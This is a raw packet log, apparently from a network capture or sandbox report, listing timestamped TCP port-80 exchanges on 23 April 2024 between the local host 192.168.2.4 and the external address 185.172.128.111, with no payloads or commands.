Apr 23, 2024 09:26:58.435863018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435877085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435895920 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435916901 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435935020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435952902 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435971022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435988903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436007023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436023951 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436043024 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436059952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436091900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436125994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436131954 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436175108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436191082 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436211109 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436228991 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436248064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436263084 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436283112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436302900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436317921 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436335087 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436353922 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436387062 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436389923 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436408997 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436424971 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436441898 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436461926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436494112 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436496973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436522961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436532974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436543941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436568975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436592102 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436605930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436624050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436640978 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436664104 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436676025 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436688900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436712980 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436729908 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436748981 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436764956 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436785936 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436803102 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436820984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436835051 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436857939 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436875105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436892986 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436908960 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436928988 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436944962 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.436964989 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.436983109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.437000036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437014103 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.437035084 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437061071 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.437071085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437088966 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.437105894 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437123060 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.437140942 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437161922 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.437177896 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437195063 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.437212944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437222004 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.437248945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437266111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.437283993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437298059 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.437320948 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437345028 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.437355042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437390089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437423944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437459946 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437494993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437530041 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437565088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437577963 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.437602043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437635899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437669992 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437704086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437740088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437776089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437781096 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.437813997 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437849998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437858105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.437886953 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437922001 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.437922955 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437959909 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.437993050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.437994957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438016891 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438031912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438055038 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438069105 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438086033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438103914 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438123941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438138962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438154936 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438177109 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438193083 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438214064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438229084 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438250065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438266039 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438286066 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438302040 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438321114 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438348055 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438357115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438374043 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438391924 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438409090 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438427925 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438445091 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438463926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438479900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438500881 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438517094 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438535929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438551903 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438571930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438590050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438606977 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438626051 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438644886 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438658953 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438680887 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438699007 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438716888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438733101 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438767910 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438783884 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438803911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438827991 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438839912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438851118 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438874960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438891888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438910961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438930988 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438946962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.438961983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.438983917 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.439001083 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.439019918 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.439034939 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.439070940 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.645371914 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.645431042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.645472050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.645525932 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.645560980 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.645598888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.645621061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.645621061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.645621061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.645621061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.645621061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.645632982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.645673037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.645708084 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.645709038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.645708084 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.645736933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.645745993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.645767927 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.645786047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.645807028 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.645822048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.645844936 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.645859003 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.645888090 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.645900011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.645931959 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.645936966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.645953894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.645973921 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.646008968 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.646032095 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.646032095 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.646045923 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.646068096 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.646085024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.646104097 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.646135092 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.646143913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.646181107 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.646213055 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.646234035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.646234035 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.646271944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.646310091 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.646311998 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.646346092 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.646347046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.646367073 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.646382093 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.646409035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.646418095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.646428108 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.646596909 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.852325916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.852385998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.852410078 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.852425098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.852457047 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.852463961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.852467060 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.852500916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.852505922 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.852538109 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.852544069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.852574110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.852580070 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.852608919 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.852616072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.852643967 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.852650881 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.852679968 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.852709055 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.852718115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.852730989 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.852756023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.852767944 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.852792025 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.852808952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.852826118 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.852833033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.852861881 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.852868080 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.852897882 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.852906942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.852941036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.852953911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.852989912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.852998018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853024960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853029966 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853060007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853077888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853096008 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853108883 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853138924 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853147030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853184938 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853185892 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853219986 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853229046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853255033 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853281021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853290081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853296995 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853327036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853332996 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853363037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853368044 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853398085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853413105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853434086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853440046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853468895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853476048 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853504896 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853509903 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853539944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853560925 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853575945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853595972 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853610992 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853631020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853646040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853668928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853681087 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853688955 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853715897 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853720903 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853750944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853755951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853786945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853792906 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853821993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853827953 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853857040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853863955 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853892088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853898048 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853926897 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853933096 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853961945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.853967905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.853996992 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854002953 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854032040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854038954 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854068041 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854077101 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854103088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854108095 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854137897 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854152918 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854173899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854180098 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854212046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854218006 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854248047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854255915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854285002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854289055 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854321003 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854337931 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854357958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854361057 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854398966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854407072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854434967 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854435921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854470015 CEST	80	49730	185.172.128.111	192.168.2.4
